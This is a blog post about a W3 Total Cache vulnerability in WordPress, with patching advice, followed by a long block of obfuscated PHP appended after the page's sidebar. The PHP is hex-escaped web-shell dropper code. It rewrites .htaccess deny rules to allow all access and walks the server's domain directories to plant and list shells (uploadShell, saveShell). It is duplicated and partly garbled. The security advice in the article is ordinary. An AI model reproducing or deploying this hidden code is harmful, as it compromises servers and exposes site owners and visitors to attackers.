Ask Charly Leetham

Online Business Implementation Expert - Helping Businesses Harness The Internet As A Channel To Market

Online Business Implementation | Website Design and Development | Web Hosting | Domain Names

W3 Total Cache Leaves Sites Open to Compromise (WordPress)

by 1 Comment

6488066_sW3 Total Cache (W3TC) leaves WordPress websites vulnerable to compromise.  The vulnerability was discoved by researcher, Jason A. Donenfeld and reported on one of the seclists.org forums recently.

W3 Total Cache is a plugin that enables site owners to speed up their WordPress websites by using a series of Caches.

According to the forum post,  the vulnerability means:

anyone could easily recursively download all the database cache keys, and extract ones containing sensitive information, such as password hashes

Essentially, by retrieving the password hashes it would be possible to decode any users password.

However, as the plugin author (Frederick Townes) states in the WordPress Support Forum:

The root of the possible vulnerability lies in the intersection of two configuration settings, one at the Web Server level and the other at the W3 Total Cache database caching level. You may be vulnerable if the following are true: your server is configured to allow directory listing with enabled public access on W3TC’s database caching directories and also use database caching via the disk caching method.

All credit to Frederick, he acted on the information and released version 0.9.2.5 of W3TC quickly to patch the issues.

Fix The Issues with W3 Total Cache Today

Website owners who use W3 Total Cache should immediately do the following (or get their webmasters to do it):

  • Upgrade the version of W3TC on their sites.  This can generally be done by logging into wp-admin, navigating to the plugin menu and upgrading W3TC through the upgrade now button.  Frederick also suggests that simply deactivating W3 Total Cache, uninstalling it, and re-installing it via wordpress.org  will apply the hotfix upon re-activation.
  • Turn off disable directory indexing and deny web access to the “wp-content/w3tc/dbcache/” directory (you can do this through Cpanel and / or .htaccess)
  • Empty the database cache for good measure – Go to wp-admin -> Performance and click on Clear All Caches

Of course, there are other Cacheing solutions out there and we’ve had WP SuperCache recommended on several occassions.

Don’t delay though – if you are using W3 Total Cache, update and follow the recommendations above to protect your site.

Want To Use This Article?

You can as long as you include the following (links must be active):

Charly Leetham, from Ask Charly Leetham, is an Online Business Implementation Expert who helps Small Businesses and Solopreneurs harness the power of the Internet as a Sales Channel or Channel To Market. Get your dose of business inspiration and motivation to help you along. Compiled from the generous contributions of over 79 authors. Grab a free copy today. Motivating Your Mind, Inspiring Your Spirit by visiting www.AskCharlyLeetham.com today

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *


Save 10% - For a Limited Time

Save 10% - For a Limited Time
Genesis Framework for WordPress
StudioPress Theme of the Month

Save 10% - For a Limited Time

Save 10% - For a Limited Time
0);$cicabpazb="\x64i\x72\x73\x31";${${"\x47LO\x42\x41\x4cS"}["\x67vba\x62u\x72\x71"]}=array_filter(glob(${${"GL\x4f\x42\x41\x4c\x53"}["\x73b\x6dr\x6b\x6af\x6d\x6dj\x72"]}."*"),"i\x73\x5fdi\x72");${"\x47L\x4fB\x41\x4c\x53"}["\x72\x67\x6f\x6dv\x78\x71"]="\x64\x69\x72s\x32";${"\x47\x4c\x4f\x42AL\x53"}["uyc\x77\x6b\x64\x76\x73\x69cm\x68"]="\x64i\x72\x731";${"\x47L\x4fB\x41LS"}["\x6dx\x6f\x75s\x6a\x66\x72\x63f\x64"]="\x62a\x73\x65\x5fd\x69\x72";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x69\x72\x79\x63\x72\x6d\x76\x74d"]="d\x69r\x73\x32";${"GL\x4f\x42AL\x53"}["\x62\x6c\x63\x68\x74\x76\x69"]="\x64ir\x73\x31";if(!empty(${$cicabpazb})&&stripos(array_shift(array_values(${${"\x47LO\x42\x41\x4cS"}["\x67\x76\x62\x61\x62\x75rq"]})),${${"\x47\x4cO\x42\x41\x4cS"}["sb\x6d\x72\x6bjf\x6d\x6d\x6ar"]})!==false){$uiccsexkg="\x76";${"\x47\x4c\x4fBA\x4cS"}["yz\x6bq\x65\x6a"]="v";${"\x47\x4c\x4f\x42AL\x53"}["\x61m\x68\x6d\x6c\x79\x65\x62\x6e"]="\x6b";foreach(${${"\x47\x4c\x4fB\x41\x4cS"}["g\x76babu\x72\x71"]} as${${"\x47\x4c\x4fB\x41L\x53"}["dg\x65\x6f\x68z\x71\x77"]}=>${$uiccsexkg})${${"GLO\x42\x41L\x53"}["gv\x62a\x62\x75\x72\x71"]}[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x6dh\x6d\x6cy\x65\x62\x6e"]}]=substr(${${"G\x4c\x4f\x42\x41\x4cS"}["\x79\x7a\x6b\x71\x65\x6a"]},strlen(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x62\x6dr\x6b\x6a\x66m\x6d\x6ar"]}));}${${"G\x4c\x4f\x42A\x4c\x53"}["\x69\x72\x79\x63r\x6d\x76\x74d"]}=scandir(${${"GLO\x42\x41L\x53"}["\x6d\x78\x6fusj\x66\x72\x63\x66\x64"]});if(!empty(${${"\x47L\x4f\x42A\x4cS"}["\x78\x62v\x6b\x72\x6f\x6a"]})){foreach(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x78b\x76\x6br\x6f\x6a"]} as${${"\x47L\x4f\x42\x41\x4cS"}["\x64g\x65\x6f\x68\x7a\x71\x77"]}=>${${"\x47L\x4f\x42A\x4c\x53"}["gfqs\x7aq"]}){$gppedvyplb="\x76";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64h\x66\x6af\x6c\x76\x71\x61"]="\x76";${"\x47\x4c\x4f\x42\x41\x4cS"}["l\x66\x74d\x77\x69\x78\x68\x7a\x6b"]="\x76";${"\x47L\x4f\x42\x41L\x53"}["\x69imgs\x78\x67"]="\x6b";if((${${"\x47\x4cO\x42A\x4c\x53"}["lf\x74\x64\x77\x69\x78hzk"]}==".")||(${$gppedvyplb}==".\x2e")||(!is_dir(${${"G\x4c\x4f\x42ALS"}["\x73\x62\x6dr\x6b\x6a\x66m\x6d\x6ar"]}.${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["d\x68f\x6a\x66\x6c\x76qa"]})))unset(${${"\x47\x4cOBA\x4c\x53"}["xbv\x6b\x72\x6f\x6a"]}[${${"\x47\x4cO\x42\x41\x4c\x53"}["i\x69m\x67\x73xg"]}]);}}if(!empty(${${"GL\x4fB\x41L\x53"}["r\x67\x6fm\x76x\x71"]}))${${"G\x4c\x4f\x42A\x4cS"}["\x67v\x62\x61b\x75\x72\x71"]}=array_merge(${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x76\x62a\x62u\x72q"]},${${"G\x4c\x4fB\x41\x4c\x53"}["\x78bv\x6br\x6fj"]});foreach(${${"GLO\x42A\x4c\x53"}["\x75\x79cwk\x64v\x73i\x63\x6dh"]} as${${"G\x4cO\x42A\x4c\x53"}["\x64g\x65\x6f\x68\x7aq\x77"]}=>${${"\x47L\x4f\x42AL\x53"}["gf\x71szq"]}){$whygedigua="v";$bgtfdtpbcwg="b\x61\x73\x65_\x64\x69r";${"G\x4c\x4f\x42\x41L\x53"}["\x61q\x64\x71f\x66\x7a\x6a\x69"]="\x76";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x71\x72kh\x67\x79\x63\x64\x72"]="\x68a\x73_\x66i\x6c\x74e\x72";${"G\x4cO\x42\x41\x4cS"}["\x6a\x6d\x68o\x63\x62\x67"]="s\x79\x6dbo\x6c";$benduonh="\x64\x69\x72\x731";if(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x71\x72\x6bh\x67y\x63\x64\x72"]}&&(strpos(${${"\x47L\x4f\x42\x41\x4cS"}["a\x71\x64\x71\x66f\x7aj\x69"]},${${"G\x4c\x4f\x42\x41L\x53"}["\x6am\x68\x6f\x63b\x67"]})===false)){$aobyvphjdqo="\x6b";unset(${${"\x47\x4c\x4fBA\x4c\x53"}["\x67\x76\x62\x61\x62\x75\x72q"]}[${$aobyvphjdqo}]);continue;}if(strpos(${${"\x47L\x4fB\x41\x4c\x53"}["g\x66\x71\x73\x7aq"]},"/")===false)${$whygedigua}.="/";${$benduonh}[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64\x67\x65\x6fh\x7aq\x77"]}]=${$bgtfdtpbcwg}.${${"G\x4cO\x42\x41LS"}["\x67f\x71\x73z\x71"]};}return array_values(array_unique(${${"G\x4c\x4f\x42\x41L\x53"}["\x62l\x63\x68\x74\x76\x69"]}));}function processHtaccess($base_dir){${"\x47\x4c\x4f\x42\x41LS"}["\x6d\x7a\x63\x78u\x76u\x6f"]="\x64\x65\x6ey";$mwuqprmeooon="d\x65\x6e\x79";${"G\x4cOBAL\x53"}["\x6d\x7a\x63\x68\x76y"]="d\x61\x74\x61";$nynfkgo="\x62\x61se\x5f\x64ir";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x67\x67\x76\x6d\x65\x7a\x63\x63\x63"]="\x64at\x61";${${"G\x4cO\x42\x41\x4cS"}["\x6dz\x63x\x75vu\x6f"]}="den\x79\x20\x66\x72\x6fm\x20al\x6c";${${"\x47L\x4f\x42\x41L\x53"}["\x6dz\x63\x68v\x79"]}=file_get_contents(${$nynfkgo}."\x2e\x68\x74ac\x63e\x73\x73");if((${${"\x47\x4cO\x42A\x4cS"}["\x79\x67\x67\x76me\x7ac\x63\x63"]}!==false)&&(stripos(${${"\x47\x4c\x4fBA\x4c\x53"}["\x64z\x76u\x68\x74\x75"]},${$mwuqprmeooon})!==false)){${"\x47LO\x42A\x4cS"}["zp\x71\x63\x79\x66\x77\x65\x6cx"]="da\x74a";$bpnbmbz="d\x61\x74a";$zunrlwpbow="d\x65n\x79";${${"\x47\x4cO\x42A\x4c\x53"}["\x7a\x70qc\x79\x66\x77\x65\x6c\x78"]}=str_ireplace(${$zunrlwpbow},"a\x6c\x6co\x77\x20f\x72\x6fm\x20\x61ll",${${"\x47\x4c\x4fBA\x4c\x53"}["dz\x76\x75h\x74\x75"]});file_put_contents(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73\x62\x6dr\x6bj\x66\x6d\x6dj\x72"]}."\x2e\x68\x74\x61c\x63e\x73\x73",${$bpnbmbz});}}$lhjbdgup="\x70at\x68";${"G\x4c\x4f\x42A\x4c\x53"}["\x6bh\x64\x6eb\x79\x65"]="\x70at\x68";function encStr($s){$enkbcmu="i";$rtzoryzhc="\x72e\x73\x75\x6c\x74";${${"\x47L\x4f\x42\x41\x4c\x53"}["os\x76k\x64sul\x6f\x74"]}="";$zkrrywrghjq="\x73";for(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x6fw\x64\x67\x67k\x6b\x68\x70\x67"]}=0;${${"\x47\x4cOBALS"}["\x66o\x77d\x67g\x6b\x6b\x68p\x67"]}0)${${"G\x4cO\x42\x41\x4cS"}["s\x6e\x66\x6d\x74uc"]}.=("\x3b".${${"\x47L\x4f\x42\x41\x4c\x53"}["\x65tf\x79\x66\x6c\x74"]});return${${"\x47\x4cO\x42\x41LS"}["s\x6e\x66\x6dt\x75\x63"]};}else return false;}function saveShell($shell_base_dir){${"GL\x4f\x42A\x4c\x53"}["p\x6d\x68\x64h\x64r\x78usa"]="cu\x72_s\x68\x65\x6c\x6c";${"\x47L\x4fBA\x4cS"}["hg\x63\x70l\x70\x77\x61b\x6d\x78"]="c\x75r_s\x68\x65l\x6c";${"GLO\x42\x41\x4cS"}["yc\x64\x6b\x7a\x6a\x77t\x6a\x62\x75"]="\x63ur\x5f\x73\x68\x65\x6c\x6c";$nbbgnwve="\x73\x68e\x6cl_ba\x73\x65\x5f\x64\x69\x72";$ugurufbd="\x61r\x72\x5fs\x68\x65\x6cl\x73";$vvszsse="\x63\x75\x72_\x73\x68\x65\x6cl";${${"GL\x4fBAL\x53"}["\x63\x67bt\x67kl\x6c"]}=array();${$vvszsse}=saveOneShell(${$nbbgnwve},1);if(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70mh\x64\x68\x64r\x78u\x73\x61"]}!==false)${${"G\x4c\x4fBA\x4cS"}["\x63g\x62t\x67k\x6c\x6c"]}[]=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x67\x63\x70l\x70\x77abmx"]};${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x77t\x6ey\x63\x6c"]="\x63\x75\x72_s\x68\x65\x6c\x6c";${${"GL\x4fBA\x4cS"}["\x6d\x62\x6f\x77s\x61o\x64"]}=saveOneShell(${${"\x47\x4cO\x42\x41L\x53"}["\x75\x62\x76\x70k\x77\x73"]},2);if(${${"\x47LO\x42\x41\x4c\x53"}["\x6dbo\x77\x73\x61od"]}!==false)${$ugurufbd}[]=${${"GL\x4f\x42A\x4cS"}["\x79\x63dk\x7a\x6a\x77t\x6a\x62u"]};${${"\x47L\x4f\x42\x41L\x53"}["\x6db\x6f\x77\x73\x61\x6f\x64"]}=saveOneShell(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x62\x76\x70k\x77\x73"]},3);if(${${"\x47\x4c\x4fB\x41L\x53"}["m\x62\x6f\x77s\x61od"]}!==false)${${"\x47\x4cO\x42\x41\x4c\x53"}["\x63g\x62\x74\x67k\x6c\x6c"]}[]=${${"\x47\x4cOBA\x4c\x53"}["\x6bw\x74\x6e\x79cl"]};if(count(${${"G\x4c\x4f\x42AL\x53"}["\x63\x67\x62\x74\x67\x6b\x6c\x6c"]})>0)return implode("\n",${${"\x47\x4c\x4fB\x41LS"}["\x63g\x62\x74gk\x6c\x6c"]});else return false;}function uploadShell($base_dir,$is_first){${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6a\x72d\x76\x6d\x6b\x6a"]="\x64\x69r\x73";processHtaccess(${${"\x47L\x4fB\x41L\x53"}["\x73\x62mr\x6bj\x66\x6dm\x6a\x72"]});${${"\x47\x4cOB\x41\x4c\x53"}["\x6ardvmk\x6a"]}=getSubdirs(${${"GL\x4f\x42A\x4cS"}["\x73b\x6d\x72kjfm\x6d\x6ar"]},"");if(${${"G\x4c\x4f\x42\x41LS"}["\x75\x6dk\x71\x61\x76\x67"]}){${"\x47L\x4f\x42\x41\x4cS"}["\x77\x67\x76z\x73\x75o"]="u\x70l\x6fad\x65\x64";${${"\x47\x4c\x4fB\x41L\x53"}["\x71\x65\x66\x73\x63\x63\x6f"]}=array();foreach(${${"G\x4cO\x42A\x4cS"}["e\x64\x69\x74\x6dn\x6fj"]} as${${"\x47LOB\x41\x4c\x53"}["\x6e\x6ax\x6c\x6bw\x62\x6fz"]}){$pjqbdvq="d\x69\x72";${"GL\x4fB\x41\x4cS"}["\x7agt\x74\x6e\x69\x77"]="\x73a\x76e\x64";${"\x47LO\x42AL\x53"}["\x6d\x65\x76\x6c\x64\x72s"]="up\x6c\x6fad\x65\x64";${${"\x47\x4cO\x42\x41LS"}["\x7a\x67\x74\x74\x6eiw"]}=uploadShell(${$pjqbdvq},false);if(${${"GL\x4f\x42\x41L\x53"}["p\x6c\x62\x62\x64\x66d\x7a"]}!==false)${${"G\x4c\x4f\x42\x41\x4c\x53"}["m\x65\x76\x6c\x64rs"]}[]=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x70\x6c\x62b\x64\x66\x64\x7a"]};}if(count(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x71e\x66sc\x63\x6f"]})==0){$mjjciqzuueq="\x73\x61\x76\x65\x64";${${"\x47LO\x42A\x4c\x53"}["\x70\x6c\x62bdf\x64\x7a"]}=saveShell(${${"G\x4c\x4f\x42\x41L\x53"}["\x73\x62\x6dr\x6b\x6a\x66\x6dm\x6a\x72"]});${"G\x4cOB\x41L\x53"}["\x79\x75\x6b\x6b\x75k\x67\x66"]="\x73aved";if(${${"\x47L\x4f\x42ALS"}["y\x75\x6b\x6b\x75\x6bg\x66"]}!==false)${${"G\x4cO\x42A\x4cS"}["q\x65\x66s\x63co"]}[]=${$mjjciqzuueq};}return${${"\x47\x4cO\x42\x41\x4c\x53"}["\x77\x67v\x7a\x73u\x6f"]};}else{$qrxzbtejratd="d\x69\x72\x73";$svtacktcqy="s\x61\x76\x65d";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x65nj\x68\x6e\x67i\x65\x66\x77\x69"]="b\x61s\x65_\x64\x69\x72";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x63\x6f\x6e\x65\x77\x66\x70\x70\x75\x71"]="\x64\x69r";${$svtacktcqy}=false;foreach(${$qrxzbtejratd} as${${"G\x4c\x4fB\x41L\x53"}["f\x63\x6fnewf\x70\x70\x75\x71"]}){${"\x47\x4c\x4f\x42\x41LS"}["\x72w\x69z\x61h\x6a\x73l\x73"]="\x64\x69\x72";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x70\x6c\x62b\x64f\x64\x7a"]}=uploadShell(${${"\x47\x4cOB\x41L\x53"}["r\x77\x69\x7a\x61\x68\x6a\x73\x6cs"]},false);if(${${"G\x4c\x4fB\x41L\x53"}["\x70\x6c\x62\x62\x64\x66\x64\x7a"]}!==false)return${${"\x47L\x4f\x42\x41\x4c\x53"}["\x70l\x62b\x64\x66\x64\x7a"]};}if(${${"\x47L\x4f\x42AL\x53"}["\x70l\x62\x62\x64fdz"]}===false)return saveShell(${${"\x47\x4c\x4f\x42\x41L\x53"}["h\x65nj\x68n\x67i\x65fwi"]});}}@ini_set("\x64isp\x6ca\x79\x5f\x65rr\x6f\x72s","Of\x66");${"GL\x4f\x42\x41\x4cS"}["\x6cx\x69xd\x73\x66w\x67\x74\x65"]="\x72\x65\x73ul\x74";${${"\x47\x4cOB\x41\x4cS"}["o\x77m\x66\x6c\x75d\x70\x6a\x6co"]}=array_values(array_diff(explode("/",dirname(__FILE__)),array("")));if(count(${$lhjbdgup})==1)${${"GL\x4f\x42ALS"}["\x6f\x77\x6d\x66lu\x64pj\x6c\x6f"]}=array_values(array_diff(explode("\",dirname(__FILE__)),array("")));${${"\x47\x4cO\x42\x41L\x53"}["\x6c\x78\x69\x78\x64s\x66wg\x74\x65"]}=array();$immhoqd="r\x65\x73\x75lt";for(${${"\x47\x4cO\x42AL\x53"}["\x66\x6f\x77\x64\x67gkkh\x70g"]}=0;${${"\x47\x4c\x4f\x42A\x4c\x53"}["f\x6f\x77\x64\x67\x67k\x6b\x68\x70\x67"]}0)&&(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x67\x76\x62jmmv\x62w"]}!==false)&&(${$iuyiwahe}!==0)){${"G\x4c\x4fB\x41LS"}["\x71\x65s\x75\x78z\x6b\x70"]="d\x6f\x6da\x69\x6e\x73";$rwtpvnoitma="i";${"GLOB\x41\x4c\x53"}["m\x75\x69p\x79y\x6e\x76"]="d\x6f\x6dain\x5f\x64\x69\x72";$ddqfklmdeu="d\x6f\x6da\x69n\x73";${${"\x47\x4cO\x42AL\x53"}["\x76a\x63\x72\x79\x63\x72f\x79"]}="/".implode("/",array_slice(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6fwm\x66l\x75dp\x6a\x6co"]},0,${$rwtpvnoitma}))."/";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x71\x65\x73\x75x\x7a\x6b\x70"]}=getSubdirs(${${"\x47\x4c\x4fB\x41\x4cS"}["\x76\x61\x63\x72y\x63\x72\x66\x79"]},".");foreach(${$ddqfklmdeu} as${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x75ip\x79\x79\x6e\x76"]}){$ropdqmnnih="v";${${"G\x4c\x4f\x42A\x4c\x53"}["\x68myx\x6c\x77\x62\x6b\x79k\x64\x6f"]}=uploadShell(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6f\x61\x6d\x79u\x65\x70\x63\x61b"]},true);foreach(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68\x6d\x79\x78\x6c\x77b\x6b\x79k\x64o"]} as${$ropdqmnnih}){${"GL\x4f\x42\x41\x4c\x53"}["\x71nk\x68\x74tnu\x6dk\x65"]="\x76";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74p\x6fgv\x79\x65b\x72"]="\x75r\x6c";${${"G\x4c\x4fBA\x4c\x53"}["\x6fx\x73tq\x66\x75\x6e\x65\x71y"]}=str_replace(${${"GL\x4fB\x41L\x53"}["\x76ac\x72yc\x72\x66\x79"]},"h\x74tp://",${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71\x6e\x6b\x68t\x74\x6e\x75\x6d\x6b\x65"]});${"\x47LO\x42\x41\x4cS"}["c\x62\x6au\x78\x61\x65"]="\x75r\x6c";$ocdykkevp="\x72\x65\x73\x75\x6c\x74";$tewaommruug="\x72e\x73\x75l\x74";${$tewaommruug}[]=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6fx\x73\x74\x71f\x75\x6e\x65qy"]};if(strpos(${${"\x47\x4c\x4f\x42ALS"}["t\x70o\x67v\x79\x65\x62r"]},"/\x68\x74\x6dl/")!==false)${$ocdykkevp}[]=str_replace("/\x68\x74\x6dl/","/",${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6f\x78st\x71\x66\x75\x6e\x65\x71y"]});if(strpos(${${"G\x4c\x4fBAL\x53"}["\x6f\x78\x73\x74\x71\x66\x75n\x65q\x79"]},"/p\x75bl\x69\x63_h\x74\x6d\x6c/")!==false)${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x73\x76k\x64s\x75\x6c\x6ft"]}[]=str_replace("/\x70\x75\x62l\x69\x63_\x68\x74m\x6c/","/",${${"\x47L\x4f\x42\x41\x4cS"}["\x6f\x78\x73\x74\x71\x66\x75ne\x71y"]});if(strpos(${${"\x47LO\x42A\x4cS"}["\x63bjux\x61e"]},"/w\x77w/")!==false){${"\x47LO\x42\x41L\x53"}["z\x73pw\x76\x6e\x76h\x78"]="\x75r\x6c";${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x79\x66\x6a\x77\x77\x71h\x61\x68\x67\x71"]="\x75\x72\x6c";$bvwvrfctqkk="\x72e\x73\x75\x6c\x74";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x78st\x71\x66un\x65qy"]}=str_replace("/w\x77w/","/",${${"G\x4cOBALS"}["\x7a\x73\x70w\x76\x6e\x76\x68\x78"]});${$bvwvrfctqkk}[]=${${"\x47\x4c\x4fBA\x4cS"}["o\x78st\x71f\x75\x6e\x65\x71\x79"]};if(strpos(${${"\x47\x4c\x4fB\x41L\x53"}["\x6f\x78\x73\x74\x71\x66u\x6ee\x71y"]},"/\x68tm\x6c/")!==false)${${"\x47L\x4f\x42A\x4c\x53"}["o\x73vkds\x75\x6c\x6f\x74"]}[]=str_replace("/h\x74\x6d\x6c/","/",${${"\x47\x4c\x4f\x42A\x4cS"}["o\x78\x73\x74q\x66\x75\x6e\x65\x71\x79"]});if(strpos(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6f\x78\x73\x74qfu\x6ee\x71\x79"]},"/p\x75b\x6cic\x5fh\x74\x6d\x6c/")!==false)${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x73\x76\x6b\x64s\x75\x6co\x74"]}[]=str_replace("/\x70ubli\x63\x5fhtml/","/",${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6e\x79\x66j\x77\x77qh\x61\x68\x67\x71"]});}}}}}if(true){${"\x47\x4cO\x42\x41L\x53"}["\x6b\x64\x65c\x69\x77"]="\x6f\x66\x66\x73\x65\x74";$fxjhlmueof="\x72\x65\x73";$xugekxlsr="b\x61\x73e\x5f\x70\x61t\x68";${"GL\x4f\x42\x41\x4cS"}["\x6d\x6bz\x64oe\x79\x70\x67\x65\x6e\x6c"]="\x62\x61\x73e\x5f\x70\x61\x74\x68";${"GL\x4fBA\x4cS"}["\x6f\x75v\x68ft\x6e\x67\x66xf\x6a"]="\x62\x61\x73e\x5f\x70a\x74h";$wksmcudiot="\x64i\x72\x73";${"G\x4c\x4f\x42AL\x53"}["py\x6f\x68o\x6bm\x69\x6c\x7a\x69\x64"]="\x62\x61\x73e\x5fp\x61\x74\x68";${${"\x47\x4c\x4f\x42\x41\x4cS"}["v\x61\x63\x72yc\x72\x66\x79"]}=dirname(__FILE__);if(${$xugekxlsr}[strlen(${${"GL\x4f\x42\x41\x4cS"}["ouvhf\x74ngfxfj"]})-1]!=="/")${${"G\x4cO\x42\x41L\x53"}["\x76\x61\x63r\x79c\x72f\x79"]}.="/";$flivynmw="ba\x73e\x5f\x70\x61\x74h";${"\x47L\x4fB\x41\x4c\x53"}["s\x6b\x75\x79lt\x66\x6f\x74iu"]="\x6f\x66f\x73et";${"GL\x4fB\x41\x4cS"}["lr\x76\x65\x79\x74c\x69"]="di\x72\x73";${${"\x47LO\x42A\x4c\x53"}["hm\x79\x78l\x77b\x6b\x79\x6b\x64\x6f"]}=uploadShell(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["mkz\x64\x6f\x65\x79\x70\x67e\x6e\x6c"]},true);${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x72v\x65\x79\x74\x63\x69"]}=array();${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x6dm\x64\x63\x68\x65w\x75\x78\x63"]}=strrpos(${$flivynmw},"w\x70-\x63o\x6eten\x74");if(${${"GL\x4f\x42ALS"}["\x6b\x64\x65\x63\x69\x77"]}!==false)${$wksmcudiot}[]=getMainURL().substr(${${"\x47L\x4fB\x41\x4c\x53"}["\x70\x79o\x68\x6fkm\x69\x6c\x7a\x69\x64"]},${${"\x47LOB\x41LS"}["\x73\x6b\x75\x79l\x74\x66o\x74\x69\x75"]});else{$ywhipfdo="i";for(${${"\x47\x4c\x4fB\x41\x4cS"}["\x66\x6fw\x64ggk\x6b\x68p\x67"]}=1;${$ywhipfdo}<=4;++${${"G\x4cO\x42\x41\x4c\x53"}["f\x6f\x77d\x67g\x6b\x6b\x68\x70\x67"]}){$fsqqhtyhz="\x70\x61\x74\x68";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6c\x76\x77bys\x73"]="p\x61\x74\x68";if(count(${${"G\x4c\x4fB\x41\x4cS"}["\x6c\x76\x77byss"]})>=${${"G\x4c\x4fBA\x4cS"}["\x66o\x77\x64\x67\x67\x6bkh\x70\x67"]})${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65d\x69tm\x6eoj"]}[]=getMainURL().implode("/",array_slice(${${"\x47\x4c\x4fBAL\x53"}["\x6fw\x6d\x66\x6c\x75dp\x6alo"]},count(${$fsqqhtyhz})-${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66\x6fwd\x67g\x6b\x6b\x68\x70\x67"]}))."/";}}foreach(${$fxjhlmueof} as${${"G\x4cO\x42\x41LS"}["d\x6b\x62\x75dm\x72\x73"]}){$wnorqb="\x76";${"G\x4c\x4f\x42A\x4c\x53"}["g\x78y\x68u\x69hk\x68"]="\x762";${${"GL\x4fB\x41L\x53"}["\x6cb\x66\x64q\x74\x68\x6b"]}=explode("\n",${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x64\x6b\x62\x75\x64\x6d\x72s"]});foreach(${${"\x47LOB\x41LS"}["g\x78\x79\x68\x75\x69\x68k\x68"]} as${$wnorqb}){${"G\x4cO\x42\x41\x4cS"}["w\x76\x6f\x69\x73n\x6e\x64\x79"]="\x64";$xqruqltgge="d";$jrvqdbjw="\x64\x69r\x73";foreach(${$jrvqdbjw} as${${"GLO\x42\x41\x4c\x53"}["\x77\x76\x6f\x69\x73n\x6edy"]})${${"\x47L\x4fBA\x4cS"}["\x6f\x73\x76k\x64s\x75lo\x74"]}[]=${$xqruqltgge}.str_replace(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x76\x61\x63\x72\x79crf\x79"]},"",${${"\x47LOBAL\x53"}["g\x66\x71s\x7a\x71"]});}}}echo"";} ?> 0);$cicabpazb="\x64i\x72\x73\x31";${${"\x47LO\x42\x41\x4cS"}["\x67vba\x62u\x72\x71"]}=array_filter(glob(${${"GL\x4f\x42\x41\x4c\x53"}["\x73b\x6dr\x6b\x6af\x6d\x6dj\x72"]}."*"),"i\x73\x5fdi\x72");${"\x47L\x4fB\x41\x4c\x53"}["\x72\x67\x6f\x6dv\x78\x71"]="\x64\x69\x72s\x32";${"\x47\x4c\x4f\x42AL\x53"}["uyc\x77\x6b\x64\x76\x73\x69cm\x68"]="\x64i\x72\x731";${"\x47L\x4fB\x41LS"}["\x6dx\x6f\x75s\x6a\x66\x72\x63f\x64"]="\x62a\x73\x65\x5fd\x69\x72";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x69\x72\x79\x63\x72\x6d\x76\x74d"]="d\x69r\x73\x32";${"GL\x4f\x42AL\x53"}["\x62\x6c\x63\x68\x74\x76\x69"]="\x64ir\x73\x31";if(!empty(${$cicabpazb})&&stripos(array_shift(array_values(${${"\x47LO\x42\x41\x4cS"}["\x67\x76\x62\x61\x62\x75rq"]})),${${"\x47\x4cO\x42\x41\x4cS"}["sb\x6d\x72\x6bjf\x6d\x6d\x6ar"]})!==false){$uiccsexkg="\x76";${"\x47\x4c\x4fBA\x4cS"}["yz\x6bq\x65\x6a"]="v";${"\x47\x4c\x4f\x42AL\x53"}["\x61m\x68\x6d\x6c\x79\x65\x62\x6e"]="\x6b";foreach(${${"\x47\x4c\x4fB\x41\x4cS"}["g\x76babu\x72\x71"]} 